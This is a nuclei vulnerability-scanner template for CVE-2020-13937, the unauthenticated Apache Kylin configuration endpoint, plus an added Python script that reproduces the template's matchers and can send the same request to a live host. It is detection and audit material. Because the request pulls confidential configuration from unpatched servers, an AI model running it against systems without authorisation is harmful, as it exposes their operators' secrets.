id: CVE-2020-13937

info:
  name: Apache Kylin Unauth
  author: pikpikcu
  severity: medium
  description: |
    Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0 and 4.0.0-alpha expose one REST API endpoint (/kylin/api/admin/config) that returns Kylin's configuration without any authentication. This is dangerous because confidential configuration entries are disclosed to anyone who can reach the endpoint.
  reference: |
    - https://kylin.apache.org/docs/release_notes.html
    - https://s.tencent.com/research/bsafe/1156.html
  tags: cve,cve2020,apache

requests:
  - method: GET
    path:
      - "{{BaseURL}}/kylin/api/admin/config"
    headers:
      Content-Type: application/json

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - config
          - kylin.metadata.url
        condition: and
        part: body
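The template's detection is the conjunction of three matchers: an HTTP 200, `application/json` somewhere in the response headers, and both `config` and `kylin.metadata.url` in the body. The following stand-alone Python script is an added example, not part of the nuclei template or of Apache Kylin; it re-implements that matcher logic so you can see what the template accepts and rejects, and wraps it in an optional live check. The sample responses are constructed for illustration (not captured from a real host), and `check_target`, `matches` and `BODY_WORDS` are names chosen here, not nuclei or Kylin APIs.

```python
"""Re-implementation of the CVE-2020-13937 template's matchers (added example).

Not part of the nuclei template or of Apache Kylin. Mirrors the template's
three matchers joined with matchers-condition: and, so the outcome on a given
response is exactly the template's outcome.
"""
import urllib.error
import urllib.request

PATH = "/kylin/api/admin/config"               # path from the template
BODY_WORDS = ("config", "kylin.metadata.url")  # word matcher, condition: and


def matches(status: int, headers: dict, body: str) -> bool:
    """Return True only when every matcher in the template would fire."""
    # matcher 1: type: status, 200
    if status != 200:
        return False
    # matcher 2: type: word, part: header -- nuclei matches against the raw
    # header block, so check every header line rather than one field
    header_blob = "\n".join(f"{k}: {v}" for k, v in headers.items())
    if "application/json" not in header_blob:
        return False
    # matcher 3: type: word, part: body, condition: and -- every word required
    return all(word in body for word in BODY_WORDS)


def check_target(base_url: str, timeout: float = 10.0) -> bool:
    """Issue the template's GET and run the matchers on the live response.

    Network call; only use against hosts you are authorized to test. The
    offline samples below never call this.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + PATH,
        headers={"Content-Type": "application/json"},
        method="GET",
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", "replace")
            return matches(resp.status, dict(resp.headers), body)
    except urllib.error.HTTPError as err:
        # A 401/403 from a patched instance fails the status matcher
        body = err.read().decode("utf-8", "replace")
        return matches(err.code, dict(err.headers), body)
    except (urllib.error.URLError, OSError):
        return False


# Constructed sample responses (assumed shapes, not captured from a real host).
LEAKING_RESPONSE = (
    200,
    {"Content-Type": "application/json;charset=UTF-8", "Server": "Apache-Coyote/1.1"},
    '{"code":"000","data":{"config":"kylin.metadata.url=kylin_metadata@hbase\\n'
    'kylin.env.hdfs-working-dir=/kylin\\n"},"msg":""}',
)
PATCHED_RESPONSE = (
    401,
    {"Content-Type": "application/json;charset=UTF-8"},
    '{"code":"401","msg":"Unauthorized"}',
)
UNRELATED_JSON = (
    200,
    {"Content-Type": "application/json"},
    '{"config":{"theme":"dark"}}',  # has "config" but not the Kylin key
)

if __name__ == "__main__":
    samples = (
        ("leaking", LEAKING_RESPONSE),
        ("patched", PATCHED_RESPONSE),
        ("unrelated", UNRELATED_JSON),
    )
    for name, resp in samples:
        print(f"{name}: {'VULNERABLE' if matches(*resp) else 'no match'}")
```

Run it with no arguments to see the matcher outcome on the three constructed samples; `check_target("http://host:7070")` performs the template's request against a live instance. Note that the body matcher needs both words, so a JSON document that merely contains `config` (the third sample) does not trigger, and a 401 from a patched Kylin fails at the status matcher before the body is inspected.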